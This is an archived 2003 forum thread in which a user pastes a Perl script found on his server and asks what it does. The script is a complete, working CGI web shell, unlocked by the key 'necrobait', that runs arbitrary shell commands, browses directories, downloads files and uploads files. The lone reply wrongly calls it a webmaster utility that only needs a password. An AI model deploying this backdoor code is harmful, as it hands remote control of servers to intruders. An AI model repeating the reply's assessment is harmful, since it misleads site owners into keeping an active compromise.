Specials | Announcements | Contact | Site Map

Search WillMaster.com:

WillMaster > Support > CGI Q&A

If you don't find the answer to your question in these archives, ask your CGI question at the Current Master Series CGI Forum.

Anyone Seen this script?

Author

Message

26Aug03

Steve

Subject: Anyone Seen this script?

i found this script one of our servers just wondering if anyone here has any idea what it's set to do if it's executed and where ?
=======
#!/usr/bin/perl -w

use strict;
use CGI qw(:cgi :form :html2 escapeHTML);

# initialization
$ENV{"PATH"} .= ":/bin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin";
my $QUERY = new CGI;
my $ACT = $QUERY->param("act");
my $KEY = $QUERY->param("key");

sub send_file
{
my $file = shift;
my $sendname = shift;
my $content;

if ( `which gzip` )
{
my $cmd = "gzip -c " . quotemeta ($file);
$content = `$cmd`;
$sendname = "$file.gz" if $content;
}

if ( !$content )
{
open FH, "<$file" or return "Not could open file $file: $!";
binmode FH;
local $/;
$content = <FH>;
close FH;
}

return "File is empty" if length($content) == 0;

print $QUERY->header(-type => "application/x-gzip",
-Content_Length => length($content),
-attachment => $sendname);
binmode STDOUT;
print $content;
return;
}

sub process_request()
{
if ( $ACT eq 'e' && $QUERY->param("cmd") )
{
my $cmd = $QUERY->param("cmd");

if ( $QUERY->param("sv") )
{
my $tempfile = "/tmp/output.$$";
system ("$cmd 1>$tempfile 2>&1");

if ( -s $tempfile > 0 )
{
my $res = send_file ($tempfile, "output.log");
unlink $tempfile;
exit 0 if !$res;
return $res;
}

unlink $tempfile;
return "$cmd: no output generated";
}

return `$cmd 2>&1`;
}
elsif ( my $file = $QUERY->param("file") )
{
my $path = $QUERY->param("path");
open FH, ">$path/$file" || return "Not could upload $file to $path: $!";
binmode FH;
while ( read ($file, my $buffer, 1024) ) {
print FH $buffer;
}
close FH;
return "$file is uploaded successfully";
}
elsif ( my $fdl = $QUERY->param("dl") )
{
return send_file ($fdl, $fdl);
}
}

sub generate_workspace()
{
my $self = $QUERY->url();
if ( $ACT eq 'e' )
{
print $QUERY->start_form (-action=>$self)
. "Cmd:"
. $QUERY->textfield ("cmd", $QUERY->param("cmd"),100,150)
. $QUERY->hidden("act", $ACT)
. $QUERY->hidden("key", $KEY)
. $QUERY->submit('pr', 'Print')
. $QUERY->submit('sv', 'Save')
. $QUERY->endform();

}
elsif ( $ACT eq "d" )
{
my $curr = `pwd`;
chomp $curr;
my $dir = $QUERY->param("dir") || $curr;
chdir $dir or print "Not could chdir to $dir: $!";

print "Directory listing for $dir
\n

";
foreach my $ln (`ls -la`)
{
chomp $ln;
next if $ln !~/^(.*?)\s+\d+\s+(\w+)\s+(\w+)\s+(\d+)\s+(\w+)\s+(\d+)\s+([\w\d:]+)\s+(.*)$/;
my ($mode, $user, $group, $size, $date, $file) = ($1, $2, $3, $4, "$5 $6 $7", $8);
next if $file eq ".";

if ( -d $file )
{
$file = "<a href=\"$self?key=$KEY&act=d&dir=$dir/$file\">" . escapeHTML($file) . "</a>";
}
elsif ( -f $file )
{
$file = "<a href=\"$self?key=$KEY&dl=$dir/$file\">" . escapeHTML($file) . "</a>";
}
else
{
$file = escapeHTML($file);
}

print "

";
}
print "

$mode

$user:$group

$size

$date

$file

";
}
elsif ( $ACT eq "u" )
{
print $QUERY->start_multipart_form (-action=>$self)
. "Path: "
. $QUERY->textfield ("path", ".")
. "File: "
. $QUERY->filefield ("file")
. $QUERY->hidden("key", $KEY)
. $QUERY->submit('up', 'Upload')
. $QUERY->endform();
}
else
{
my $url = $QUERY->url() . "?key=$KEY";
print "Select CGI shell action:
"
. "<a href=\"$url&act=e\">execute a command</a>
"
. "<a href=\"$url&act=d\">download a file</a>
"
. "<a href=\"$url&act=u\">upload a file</a>
";
}
}

# main
if ( $KEY ne "necrobait" )
{
print $QUERY->redirect ("/");
exit;
}

my $content = process_request();

print header();
print $QUERY->start_html (-title=>"CGI shell welcomes you!", -BGCOLOR=>'white');

generate_workspace();

print pre(escapeHTML($content)) if defined $content;
print $QUERY->end_html();
=========

26Aug03

Will

[Email]

In response to: Anyone Seen this script?

It appears to be a script allowing file up/downloading, directory creation, and other webmaster activities. You'll probably want to put this thing somewhere behind a password.